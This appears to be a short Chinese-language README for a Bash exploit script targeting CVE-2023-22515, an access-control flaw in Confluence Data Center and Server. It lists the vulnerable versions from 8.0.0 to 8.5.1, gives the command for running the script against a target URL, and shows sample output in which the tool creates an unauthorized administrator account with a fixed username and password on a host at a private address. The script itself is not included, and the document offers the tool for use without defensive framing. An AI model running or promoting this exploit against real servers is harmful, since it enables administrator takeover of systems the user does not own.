一个用于 CVE-2023-22515 的简单 Bash 脚本漏洞利用工具。
Confluence Data Center 和 Server 实例存在一个访问控制失效漏洞(CVE-2023-22515),允许攻击者创建未经授权的 Confluence 管理员账户并访问 Confluence 实例。
8.0.0
8.0.1
8.0.2
8.0.3
8.0.4
8.1.0
8.1.1
8.1.3
8.1.4
8.2.0
8.2.1
8.2.2
8.2.3
8.3.0
8.3.1
8.3.2
8.4.0
8.4.1
8.4.2
8.5.0
8.5.1
./xpl.sh [URL]
└─$ ./xpl.sh http://10.10.76.38:8090
[INFO] 正在检查目标主机是否存在漏洞...
存在漏洞 --> 响应代码: 200
[+] 正在利用目标...
[+] 漏洞利用完成!!!
[INFO] 已创建用户: a123456
[INFO] 已创建密码: ChangeMe123